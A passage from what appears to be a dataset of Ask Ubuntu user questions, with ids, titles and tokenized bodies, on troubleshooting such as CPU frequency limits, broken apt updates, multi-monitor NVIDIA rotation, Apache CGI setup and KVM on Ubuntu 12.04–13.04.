= -1 rlimit-nproc = -1 rlimit-nofile = 256 rlimit-memlock = -1 rlimit-locks = -1 rlimit-sigpending = -1 rlimit-msgqueue = -1 rlimit-nice = 31 rlimit-rtprio = 9 rlimit-rttime = 1000000 please let me know if you need any other information that i can provide - thanks in advance . edit : i found another surprising behavior , that might be related with my problem . when i have no headphones plugged in and use alsamixer to mute the headphones channel , then master , headphones and speaker channel becomes muted .
340626	permanently change maximum cpu frequency	so far i 've found temporary solution for my problem at maximum cpu frequency stuck at low value , but the question that i have is how to make it permanent . right after reboot , frequencies are set back to stock 1.90ghz . cpu model = intel ( r ) core ( tm ) i7-3517u cpu @ 1.90ghz /sys/devices/system/cpu/cpu0/cpufreq/scaling_available_frequencies = 2401000 2400000 2300000 2200000 2100000 1900000 1800000 1700000 1600000 1500000 1400000 1300000 1100000 1000000 900000 800000 [ khz ] /sys/devices/system/cpu/cpufreq/boost = 1 some other information that might be , or not , relevant : vitaliy : ~ $ cat /sys/devices/system/cpu/cpu0/cpufreq/bios_limit 1900000 and ... vitaliy : ~ $ cat /sys/module/processor/parameters/ignore_ppc0 from what i 've noticed , ignore_ppc and scaling_available_frequencies are overwritten every time on boot/reboot . not sure for bios_limit .
340628	dvd wo n't play but cd 's will	dvd wo n't play but cd 's will in my disc drive all drivers are installed still not working not sure on the problem is it is a new disc drive and worked fine on windows xp any and all help would be appreciated
340631	which bits of ubuntu need to be on an ssd ?	i 'm in the process of rebuilding a budget system from used parts . one of the components will be an 8gb ssd , to speed up the machine while continuing to use my 1tb conventional hd . i already use a separate partition for /home , and i 'm currently using lubuntu 13.04 but might change at any time to a different flavour . my root partition has now grown to over 7gb , without the /home included . i expect a fresh install will trim it down , but they do grow , with added applications and updates etc . so which bits of the system need to be on the ssd , and which can i move to the hd to leave some free space for the future ? which of the various directories does the system need fast access to , and which could be slow without noticeably slowing down the system ? thanks for any help .
340633	synchronise clocks on ubuntu running in ec2 ?	i 've got three servers running on aws ec2 using official ubuntu amis using paravirtualisation . i have noticed their clocks are out of sync by about a minute . ntp is not installed by default in the official amis . apparently ntp will not function correctly on vms . apparently you do n't need to syncronise clocks , because the vm should use the same clock as dom0 , i.e . the host machine . presumably aws run ntp on their host machines . on the other hand there are plenty of blogs telling you to run ntp and disable host clock syncronisation by running echo 1 > /proc/sys/xen/independent_wallclock . however in the official amis there is not /proc/sys/xen - there is /proc/xen , but it is empty . does anyone know how to synchronise clocks on ubuntu running in ec2 ?
340638	how do you login into /bin/bash automatically ?	im on 12.04 lts and am doing to ruby on rails development . when i start up my terminal and type in ruby -v it will list my ruby as 1.8.7 . when i type in /bin/bash -- login then ruby -v will list it as 2.0.0 which is what i want in order to run rails 4.0 . problem is that i have to type in /bin/bash -- login everytime i start up my terminal . is there a way that i can log into /bin/bash automatically when i open up my terminal ?
340641	ubuntu 13.04 does n't automount razr d1 mtp	my ubuntu 13.04 is not auto-mounting my motorola razr d1 . i have installed mtpfs with no luck . what else should i do to be able to mount and copy my awesome mp3 files in it ? thanks !
340642	update manager is not working properly	i get this message after trying the update manger : w : ignoring file 'untitled document 1 ' in directory '/etc/apt/sources.list.d/ ' as it has no filename extension , e : type 'eb ' is not known on line 2 in source list /etc/apt/sources.list.d/ehoover-compholio-precise.list i am new to ubuntu , what should i do ?
340658	apt-get update is not working	hello ubuntu community , i have been working with linux for 5 years , and with those five years , i have never had a problem with the ubuntu apt program . it usually works like a charm and is an instant way to get updates and software on the fly . but it seems that my computer can not get it 's proper updates , nor can apt-get update itself . i am running ubuntu 12.04 3.8.0-29-generic # 42~precise1-ubuntu x86_64 i am intel dual core processor . i installed 12.04 on my laptop which has similar specs to my tower , but there were no problems when i installed the ubuntu on it . so when i attempt to do sudo apt-get update i get the following : hit http : //archive.ubuntu.com precise release.gpg hit http : //archive.ubuntu.com precise-updates release.gpg hit http : //archive.ubuntu.com precise-backports release.gpg hit http : //archive.ubuntu.com precise-security release.gpg hit http : //ppa.launchpad.net precise release.gpg hit http : //archive.ubuntu.com precise release hit http : //ppa.launchpad.net precise release hit http : //archive.ubuntu.com precise-updates release hit http : //archive.ubuntu.com precise-backports release hit http : //ppa.launchpad.net precise/main sources hit http : //archive.ubuntu.com precise-security release hit http : //ppa.launchpad.net precise/main amd64 packages hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex ign http : //ppa.launchpad.net precise/main translation-en hit http : //archive.ubuntu.com precise/main sources hit http : //archive.ubuntu.com precise/restricted sources hit http : //archive.ubuntu.com precise/multiverse sources hit http : //archive.ubuntu.com precise/restricted amd64 packages hit http : //archive.ubuntu.com precise/multiverse amd64 packages hit http : //archive.ubuntu.com precise/main i386 packages hit http : //archive.ubuntu.com precise/restricted i386 packages hit http : //archive.ubuntu.com precise/multiverse i386 packages hit http : //archive.ubuntu.com precise/main translationindex hit http : //archive.ubuntu.com precise/multiverse translationindex hit http : //archive.ubuntu.com precise/restricted translationindex hit http : //archive.ubuntu.com precise/universe translationindex hit http : //archive.ubuntu.com precise-updates/restricted sources hit http : //archive.ubuntu.com precise-updates/universe sources hit http : //archive.ubuntu.com precise-updates/multiverse sources hit http : //archive.ubuntu.com precise-updates/main amd64 packages hit http : //archive.ubuntu.com precise-updates/restricted amd64 packages hit http : //archive.ubuntu.com precise-updates/universe amd64 packages hit http : //archive.ubuntu.com precise-updates/multiverse amd64 packages hit http : //archive.ubuntu.com precise-updates/restricted i386 packages hit http : //archive.ubuntu.com precise-updates/universe i386 packages hit http : //archive.ubuntu.com precise-updates/multiverse i386 packages hit http : //archive.ubuntu.com precise-updates/main translationindex hit http : //archive.ubuntu.com precise-updates/multiverse translationindex hit http : //archive.ubuntu.com precise-updates/restricted translationindex hit http : //archive.ubuntu.com precise-updates/universe translationindex hit http : //archive.ubuntu.com precise-backports/main sources hit http : //archive.ubuntu.com precise-backports/restricted sources hit http : //archive.ubuntu.com precise-backports/universe sources hit http : //archive.ubuntu.com precise-backports/multiverse sources hit http : //archive.ubuntu.com precise-backports/main amd64 packages hit http : //archive.ubuntu.com precise-backports/restricted amd64 packages hit http : //archive.ubuntu.com precise-backports/universe amd64 packages hit http : //archive.ubuntu.com precise-backports/multiverse amd64 packages hit http : //archive.ubuntu.com precise-backports/main i386 packages hit http : //archive.ubuntu.com precise-backports/restricted i386 packages hit http : //archive.ubuntu.com precise-backports/universe i386 packages hit http : //archive.ubuntu.com precise-backports/multiverse i386 packages hit http : //archive.ubuntu.com precise-backports/main translationindex hit http : //archive.ubuntu.com precise-backports/multiverse translationindex hit http : //archive.ubuntu.com precise-backports/restricted translationindex hit http : //archive.ubuntu.com precise-backports/universe translationindex hit http : //archive.ubuntu.com precise-security/main sources hit http : //archive.ubuntu.com precise-security/restricted sources hit http : //archive.ubuntu.com precise-security/universe sources hit http : //archive.ubuntu.com precise-security/multiverse sources hit http : //archive.ubuntu.com precise-security/main amd64 packages hit http : //archive.ubuntu.com precise-security/restricted amd64 packages hit http : //archive.ubuntu.com precise-security/universe amd64 packages hit http : //archive.ubuntu.com precise-security/multiverse amd64 packages hit http : //archive.ubuntu.com precise-security/restricted i386 packages hit http : //archive.ubuntu.com precise-security/universe i386 packages hit http : //archive.ubuntu.com precise-security/multiverse i386 packages hit http : //archive.ubuntu.com precise-security/main translationindex hit http : //archive.ubuntu.com precise-security/multiverse translationindex hit http : //archive.ubuntu.com precise-security/restricted translationindex hit http : //archive.ubuntu.com precise-security/universe translationindex get:1 http : //archive.ubuntu.com precise/universe sources [ 6239 kb ] get:2 http : //archive.ubuntu.com precise/main amd64 packages [ 1640 kb ] get:3 http : //archive.ubuntu.com precise/universe amd64 packages [ 6167 kb ] get:4 http : //archive.ubuntu.com precise/universe i386 packages [ 6180 kb ] get:5 http : //archive.ubuntu.com precise/main translation-en [ 726 kb ] hit http : //archive.ubuntu.com precise/multiverse translation-en 100 % [ 5 translation-en bzip2 0 b ] [ waiting for headers ] 3422 kb/s 0s bzip2 : data integrity error when decompressing . input file = ( stdin ) , output file = ( stdout ) it is possible that the compressed file ( s ) have become corrupted . you can use the -tvv option to test integrity of such files . you can use the `bzip2recover ' program to attempt to recover data from undamaged sections of corrupted files . hit http : //archive.ubuntu.com precise/restricted translation-en get:6 http : //archive.ubuntu.com precise-updates/main sources [ 504 kb ] get:7 http : //archive.ubuntu.com precise-updates/main i386 packages [ 888 kb ] hit http : //archive.ubuntu.com precise-updates/main translation-en hit http : //archive.ubuntu.com precise-updates/multiverse translation-en hit http : //archive.ubuntu.com precise-updates/restricted translation-en hit http : //archive.ubuntu.com precise-updates/universe translation-en hit http : //archive.ubuntu.com precise-backports/main translation-en hit http : //archive.ubuntu.com precise-backports/multiverse translation-en hit http : //archive.ubuntu.com precise-backports/restricted translation-en hit http : //archive.ubuntu.com precise-backports/universe translation-en get:8 http : //archive.ubuntu.com precise-security/main i386 packages [ 406 kb ] hit http : //archive.ubuntu.com precise-security/main translation-en hit http : //archive.ubuntu.com precise-security/multiverse translation-en hit http : //archive.ubuntu.com precise-security/restricted translation-en hit http : //archive.ubuntu.com precise-security/universe translation-en get:9 http : //archive.ubuntu.com precise/universe translation-en [ 4133 kb ] fetched 726 kb in 25s ( 29.0 kb/s ) w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise_universe_source_sources hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise_main_binary-amd64_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise_universe_binary-amd64_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise_universe_binary-i386_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-updates_main_source_sources hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-updates_main_binary-i386_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-security_main_binary-i386_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise_universe_i18n_translation-en encountered a section with no package : header e : some index files failed to download . they have been ignored , or old ones used instead . i remember seeing during the installation process and i was worried about it then . the first time i tried installing ubuntu 12.04.3 , the installer crashed and it said that it could not send off a report due to the software being 3rd party and that i should delete the 3rd party software . after that , i wiped my hard drive again , did a installation and after some time , it was complete ... but i still got those errors when it installing , but no crash . also , ever time i try to install a program , i get this ` ~ $ sudo apt-get install apache2 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : apache2 : depends : apache2-mpm-worker ( = 2.2.22-1ubuntu1.4 ) but it is not going to be installed or apache2-mpm-prefork ( = 2.2.22-1ubuntu1.4 ) but it is not going to be installed or apache2-mpm-event ( = 2.2.22-1ubuntu1.4 ) but it is not going to be installed or apache2-mpm-itk ( = 2.2.22-1ubuntu1.4 ) but it is not going to be installed depends : apache2.2-common ( = 2.2.22-1ubuntu1.4 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . this happens with all programs i try to install , so now my ability to install software is broken too . lastly , i have tried almost everything i could find . such as : sudo apt-get clean cd /var/lib/apt/lists/partial sudo rm * sudo apt-get clean sudo apt-get update & & sudo apt-get upgrade same result . sudo apt-get clean mv /var/lib/apt /var/lib/apt.old mv /var/cache/apt /var/cache/apt.old sudo apt-get clean sudo apt-get update & & sudo apt-get upgrade also results in failure . i even tried this link how do i resolve unmet dependencies ? i thought that would have been my last stop and i would be done with the problem . but , i am still with it . can anyone else help me to figure out what is wrong with my system ?
340660	my boot partition is filling up . what 's the solution ?	how do i know what is safe to remove ? can i make the partition larger without damaging data in that or adjacent partitions ? thanks for any help .
340664	windows 8 install - usb	i am trying to create a bootable usb to install windows 8 using ubuntu 13.04 . i tried using winusb but it was showing an error saying that the usb is set to readable , which is weird since winusb was the program that formatted it . not sure what to do with that but i am open to other ideas and other software . any ideas on what to do next ? would unetbootin work ?
340665	brand new l75d-a7280 battery reports 95 % max when plugged in , 93 % immediately after unplugged	whenever my brand new laptop 's plugged in , it reports 95 % max . it never shows 100 % or charged . also , even though i 'm not running in low power mode but am in high-gpu catalyst mode , should it drop to to 93 % immediately after unplugging ? i 've looked at the bug on launchpad , and the battery indicator & power setting panel shows wrong battery state , but neither help . how can this be resolved ?
340666	mount.ntfs taking up 99 % of cpu	i dual-boot ubuntu and windows with wubi , version 12.04 , and have been recently running into some issues . every once in a while , i run top and see that mount.ntfs is taking up all of my cpu . it is impossible to do any other tasks , and takes a few minutes just to get a terminal open . since i use wubi , mount.ntfs is always running in the background , but is using up little to none cpu . it 's large usage seems to be triggered whenever i make large changes to the disk , usually extracting a large zip file . even after it finishes , the large cpu usage continues . recently , it also happens whenever i try to run apt-get install , it starts to eat up cpu after 98 % of the repos are checked . is there any fix for this ? i should also note that the zip files , when i restart , dissapear .
340667	how to loop using while and quit after success	so , i 'm on an ubuntu 13.04 laptop and was wondering how i could loop a command until it succeeds . i 'm trying to loop `` adb connect 192.168.1.102:5555 '' ( for connecting to my android device over wifi ) every 5 seconds , but have it quit after it succeeds . i am having trouble with the latter , making it quit after it succeeds . i have the following code so far , but do n't know what i need to do to make it quit after it succeeds . http : //paste.ubuntu.com/6057217/ i know this could probably be shorter and more efficient , but i am content with everything but making it exit after the command succeeds . thanks ! cole h
340668	is 22,000,000 files and folders too many ?	long story short : i should have had a backup . now i found myself using testdisk to restore my entire operating system . however , it 's taking a very long time to move along - at about 22 million files , i 'm wondering at this point whether it 's just taking a while to recover all of those darn temp files , or if it is hanging up . it still has not moved on past /var/lib . the main errors in testdisk.log look like these : ca n't create file /media/ubuntu/recovery/var/lib/dpkg/info/libtasn1-3 : i386.shlibs/urandom/x11/pt/man5/netcat.1.gz/ncurses-bin/.greek-terminusbold20x10.psf.gz.ct4hll/greek-terminus22x11.psf.gz/pt154.so/lib/blk/suppleme.pl.dpkg-new/mmu.h.dpkg-new : not a directory ca n't create file /media/ubuntu/recovery/var/lib/dpkg/info/libtasn1-3 : i386.shlibs/urandom/x11/pt/man5/netcat.1.gz/ncurses-bin/.greek-terminusbold20x10.psf.gz.ct4hll/greek-terminus22x11.psf.gz/pt154.so/lib/blk/suppleme.pl.dpkg-new/dma-mapping.h.dpkg-new : not a directory ... ca n't create file /media/ubuntu/recovery/var/lib/dpkg/info/libtasn1-3 : i386.shlibs/urandom/x11/ja/tzdata.postrm/powerpc/include/asm.dpkg-new/scatterlist.h.dpkg-new/home/richie/.icedtea/cache/2/http/arcanists14.jagex.com/74/microsoft.net/50/partial-i386/usr/share/zoneinfo/right/america/tortola : is a directory or these : ext2fs_read_inode ( ino=825254982 ) failed with error 2133571369. ext2fs_read_inode ( ino=825254969 ) failed with error 2133571369. ext2fs_read_inode ( ino=825254982 ) failed with error 2133571369. ext2fs_read_inode ( ino=825254982 ) failed with error 2133571369. ext2fs_read_inode ( ino=825254982 ) failed with error 2133571369. ext2fs_read_inode ( ino=825254969 ) failed with error 2133571369 . my question , though , boils down to this : is it normal to be seeing as many as 22 million files in the filesystem as a normal linux user ?
340671	moving shotwell from 12.04 lts to 13.04	i was using shotwell on an old computer running 12.04 lts . not sure what the shotwell version was [ i 've looked since , and it 's 0.12.3 ] , but it would have been up-to-date for that os version . got a new computer running 13.04 and shotwell 0.14.1 ; copied pictures folder to new computer ; copied ~/.shotwell to ~/.local/share/shotwell . it kept all the tags and the images are there but the images do n't match the tags ( or vice versa ) and the images are mostly all distorted like shotwell is retaining the orientation and/or resolution for the wrong photo . so , the question is : is there a way to get the right tags matched back up with the right photos , etc. , so that everything is back like it was ? or do i just have to delete the photo.db , let shotwell re-index everything and start over retagging everything ? ( sigh ) shotwell did give me an import log , which pointed out a number of duplicate directories that i 'll be able to easily clean up . nice .
340675	send transactional emails from ubuntu server 12.04 lts in intranet	i have a cakephp web app running on a ubuntu 12.04 lts server . the server is hosted on a machine within a intranet of a corporation . the web app needs to send out transactional emails a few times a day . according to sendgrid , emails are largely divided into 2 types : marketing and transactional . transactional emails are those that notify you something has happened/ is about to happen . recipients of this email are usually advised not to reply back . because this web app i am doing is mainly for internal usage and therefore the emails sent to internal corporate users , i do not envisage the need to set up spf for emails and so on . however , i am not sure how to install an email server in ubuntu 12.04 that will work with my cakephp web app . i do know that my web app works with gmail smtp settings . all i need to do is to use the following in my cakephp email settings : public $ gmail = array ( 'host ' = > 'ssl : //smtp.gmail.com ' , 'port ' = > 465 , 'username ' = > 'some_user @ gmail.com ' , 'password ' = > 'secret_password ' , 'transport ' = > 'smtp' ) ; i believe i can use postfix , but i have never installed it before . need advice on exactly what steps i need to undertake to achieve the above . off the top of my head i think i at least need to know : how to install email server configuration for the email server how to create an account on the email server ( e.g . noreply @ ip_address ? ? ) smtp configuration for my web app to send out the email both the web app and the email server are on the same machine . another key point to add is that the machine has no direct access to the internet . it is purely on the corporate intranet .
340677	rotating screens with nvidia multi-monitor	i 'm having a problem with screen rotation . the relevant configuration info i can think of is at the end of this message . i run gnome not unity . the xorg.conf , or one very similar to it , worked for several years until may of this year when i moved and needed to use a single-monitor configuration for awhile . i tried returning to my three-monitor configuration but the right two monitors are rotated and i ca n't seem to get the nvidia driver to pay attention to the `` option `` rotate '' `` left '' '' directive . so far i 've tried : disabling xinerama in serverlayout , adding `` option '' randrrotation '' `` on '' '' directive to the two rotated screens ( both on the same nvidia card ) . this results in a proper rotation the two screens but leads to more problems . the two nvidia screens are in twinview mode , so windows maximize across both screens , i ca n't see the top or bottom of the right side of the window because the screens are very different resolutions , the intel screen seems to run it 's own gnome session with the default configuration which i can use the same mouse cursor on but can not move windows onto ( it has it 's own gnome panels ) , and dialog boxes are split down the middle between the two nvidia screens . after # 1 , changing the twinview setting in the nvidia server settings app . the screens become unrotated again . changing rotation in the display applet . this is only possible when the nvidia screens are already in twinview mode . otherwise the applet never starts , reporting `` randr extension is not present '' . same result when using randr from the command line . the most likely culprit i can think of is system updates occurring since may . unfortunately i have no idea what else to try . i saw at least four other threads for rotation problems : how do i rotate my monitor using xorg ? 12.04 multiple screens rotation issue rotating one screen with xinerama in a multihead setup rotating screen 90 degrees clockwise none provided a solution to what occurs . $ cat /etc/*-release ; sudo lspci|grep vga ; cat /proc/version ; cat /etc/x11/xorg.conf distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.3 lts '' name= '' ubuntu '' version= '' 12.04.3 lts , precise pangolin '' id=ubuntu id_like=debian pretty_name= '' ubuntu precise ( 12.04.3 lts ) '' version_id= '' 12.04 '' 3:00:02.0 vga compatible controller : intel corporation 4 series chipset integrated graphics controller ( rev 03 ) 21:01:00.0 vga compatible controller : nvidia corporation g96 [ geforce 9500 gt ] ( rev a1 ) linux version 3.2.0-52-generic ( buildd @ roseapple ) ( gcc version 4.6.3 ( ubuntu/linaro 4.6.3-1ubuntu5 ) ) # 78-ubuntu smp fri jul 26 16:21:44 utc 2013 section `` files '' modulepath `` /usr/lib/xorg/modules '' fontpath `` /usr/share/fonts/x11/misc '' fontpath `` /usr/share/fonts/x11/cyrillic '' fontpath `` /usr/share/fonts/x11/100dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/75dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/type1 '' fontpath `` /usr/share/fonts/x11/100dpi '' fontpath `` /usr/share/fonts/x11/75dpi '' fontpath `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' fontpath `` built-ins '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor1 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor2 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` device '' option `` randrrotation '' `` on '' option `` rotate '' `` right '' identifier `` card0 '' busid `` pci:1:0:0 '' driver `` nvidia '' option `` nologo '' `` true '' endsection section `` device '' identifier `` card1 '' busid `` pci:0:2:0 '' driver `` intel '' option `` nologo '' `` true '' endsection section `` device '' option `` randrrotation '' `` on '' option `` rotate '' `` left '' identifier `` card2 '' busid `` pci:1:0:0 '' driver `` nvidia '' option `` nologo '' `` true '' endsection section `` screen '' identifier `` screen0 '' device `` card0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` card1 '' monitor `` monitor1 '' subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` screen2 '' device `` card2 '' monitor `` monitor2 '' subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` module '' load `` glx '' load `` extmod '' load `` record '' load `` dbe '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/input/mice '' option `` zaxismapping '' `` 4 5 6 7 '' endsection section `` serverlayout '' identifier `` x.org configured '' screen 0 `` screen0 '' rightof `` screen1 '' screen 1 `` screen1 '' 0 0 screen 2 `` screen2 '' rightof `` screen0 '' inputdevice `` mouse0 '' `` corepointer '' inputdevice `` keyboard0 '' `` corekeyboard '' option `` xinerama '' `` on '' endsection update : i booted from an older partition and it works . this is n't a long-term solution however . $ cat /etc/*-release ; sudo lspci|grep vga ; cat /proc/version ; cat /etc/x11/xorg.conf distrib_id=ubuntu distrib_release=10.10 distrib_codename=maverick distrib_description= '' ubuntu 10.10 '' 00:02.0 vga compatible controller : intel corporation 4 series chipset integrated graphics controller ( rev 03 ) 01:00.0 vga compatible controller : nvidia corporation g96 [ geforce 9500 gt ] ( rev a1 ) linux version 2.6.35-32-generic ( buildd @ crested ) ( gcc version 4.4.5 ( ubuntu/linaro 4.4.4-14ubuntu5 ) ) # 67-ubuntu smp mon mar 5 19:39:49 utc 2012 section `` files '' modulepath `` /usr/lib/xorg/modules '' fontpath `` /usr/share/fonts/x11/misc '' fontpath `` /usr/share/fonts/x11/cyrillic '' fontpath `` /usr/share/fonts/x11/100dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/75dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/type1 '' fontpath `` /usr/share/fonts/x11/100dpi '' fontpath `` /usr/share/fonts/x11/75dpi '' fontpath `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' fontpath `` built-ins '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor1 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor2 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` screen '' identifier `` screen0 '' device `` card0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` card1 '' monitor `` monitor1 '' subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` screen2 '' device `` card2 '' monitor `` monitor2 '' subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` module '' load `` glx '' load `` extmod '' load `` record '' load `` dbe '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/input/mice '' option `` zaxismapping '' `` 4 5 6 7 '' endsection section `` serverlayout '' identifier `` x.org configured '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' leftof `` screen0 '' screen 2 `` screen2 '' rightof `` screen0 '' inputdevice `` mouse0 '' `` corepointer '' inputdevice `` keyboard0 '' `` corekeyboard '' option `` xinerama '' `` on '' endsection section `` device '' option `` rotate '' `` left '' identifier `` card0 '' busid `` pci:1:0:0 '' screen 0 driver `` nvidia '' option `` nologo '' `` true '' endsection section `` device '' identifier `` card1 '' busid `` pci:0:2:0 '' driver `` intel '' option `` nologo '' `` true '' endsection section `` device '' option `` rotate '' `` right '' identifier `` card2 '' busid `` pci:1:0:0 '' screen 1 driver `` nvidia '' option `` nologo '' `` true '' endsection
340678	can i sync ubuntu one with my computer with newly installed ubuntu ?	i recently reinstalled ubuntu . i would like to download all the files that i uploaded on ubuntu one before . however , i found it is very cumbersome to go on the web page and download every single file one by one . question . if i sync my current folder that is empty with ubuntu one , will the ubuntu one storage that contains my files be empty ? or my currently empty folder will have the same files that i uploaded on ubuntu one ? i do n't want to lose my files that i uploaded on ubuntu one and i want to download all of them on my computer at once . do you guys have any idea on this matter ? thanks .
340683	when i install ubuntu it takes long in the preparing to download , what can i do ?	i tried to install ubuntu , and it takes a long time in the preparing to install the screen , and i do n't know what to do , please help ? the reason i 'm installing it is because my computer fails to start to windows 7 and the only way i can use it is with ubuntu , so now i 'm stuck with using it on the try ubuntu . i need to install it , but it takes long as i said before i press continue and it takes a long time to go to the next part so i do n't know what to do . what can i do ? i 'm using ubuntu ( try ) right now .
340688	how do i change the keyboard shortcuts for the window manager in xubuntu 13.04 ?	i 'd like to change my alternate desktop shortcut in xubuntu . how do i do that ? i do n't see the option under keyboard 's application shortcuts ?
340694	deleting ubuntu	i have tried to format the hard drive but i ca n't ! i have tried to use the disk management option that says format , but it wo n't let me as it says it 's busy . i ca n't install windows as the hard drive is in the wrong format . help , please .
340700	android local and remote file access	i have 4 nexus 10 tablets , and 3 android phones . i would like to be able to back them up ( locally for speed ) , and pull files from the back up from anywhere ( over cellular data connection ) . what type of server/s would i use and how would i go about setting it up . i did a bunch of looking around and have no idea what direction to go . thank you in advance !
340701	wine will not use my gpu	okay , so i have been trying to fix this issue for quite sometime . i have an amd a8 cpu/apu running with an ati 6670 ( or something like that ) . i have turned off the integrated graphics card and i am just running with the 6670 . the thing is i have installed steam via wine so i can play my games that are n't supported by the linux version . i downloaded counter strike global offensive to play and i get an error message saying `` your graphics hardware does not support all features ( csm ) needed to run this game . '' the part that gets me is that the `` driver name '' is my ati radeon hd 3200 witch is my apu . i do not know how to get around this . i am currently installing legacy drivers to see if that helps . if anyone has a solution or can give me some suggestions that would be great . thank you
340702	index.pl getting downloaded instead of executing on ubuntu 12.04 and apache 2.2.22	i have installed apache 2.2.22 on ubuntu 12.04 . but in browser when i type localhost , it gives index.pl file to download instead of executing it . what i tried : 1. chmod 755 index.pl 2 . adding line directoryindex index.pl index.html to etc/apache2/site-available/example.com , which finally looks like below . i have done these things before on windows machine . but the directory structure is different in windows and ubuntu . httpd.conf file is blank in ubuntu . and while searching through directories i found no . of files similar to configuration file . so i am confused where exactly i have to make configuration changes . < virtualhost *:80 > serveradmin webmaster @ localhost servername example.com documentroot /var/www/example.com/public_html < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www/example.com/public_html > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > # this line was added by me directoryindex index.html index.pl scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined alias /doc/ `` /usr/share/doc/ '' < directory `` /usr/share/doc/ '' > options indexes multiviews followsymlinks allowoverride none order deny , allow deny from all allow from 127.0.0.0/255.0.0.0 : :1/128 < /directory > < /virtualhost >
340706	turn old boot disk into secondary drive without losing data	i have a 2tb drive with xbmcbuntu 12.04.3 installed on it and also about 1.5tb of data.i have a new , small hdd ( 40gb ) and want to install the os on it . i would like to keep the data on the hdd but just turn it into a data drive . i do n't have another 2tb drive i could transfer the data off to temporarily . is there any way i can do this without buying a 2tb external drive ?
340707	skipping grub menu ?	i am brand-spanking new to this , so please bear with me . i have recently installed ubuntu 12.04 i waited for the file to download . when my computer restarted , it gave me an option to choose between windows vista , and ubuntu . when i click on ubuntu , it brings me to a menu that talks about grub ? i pressed tab as i was instructed and it gave me a list of commands . i did not know what to do , and i can not do anything else from there , except input the commands i was given , but i do not know what any of these commands actually do . i can not use my computer from that state , i have to reset it ad go through the process all over again . please help ! i do n't know what to do . thank you in advance !
340708	kvm or qemu_kvm or qemu_system_x86_64 on ubuntu 13.04	i have a clean fresh updated install of 13.04 server with no graphical display just cli . i want to run a couple of windows and linux guests so did some research and it looked like kvm was the way to go . kvm is a bit confusing , documentation refers to kvm and qemu often interchangeably . i had been using webmin and came across the cloudmin management tools to control kvm and they seemed pretty good . they also had an install script which seemed to simplify things so i went that way . ran the script , it installed kvm and cloudmin and attempted to setup bridging but made a bit of a mess of the interfaces file which i easily sorted out . running cloudmin and it all looked straight forward however when i go to create and launch a guest i get the following error : kvm binary is deprecated , please use qemu-system-x86_64 instead i ca n't figure out how i switch the virtualisation to the above despite having read a ton of threads . when i launch kvm from the cli i get a little more info root @ ubuntux64 : / # kvm w : kvm binary is deprecated , please use qemu-system-x86_64 instead could not initialize sdl ( no available video device ) - exiting which confuses me a bit as it appears to only be a warning and the fatal error is a video device issue . any help would be appreciated .
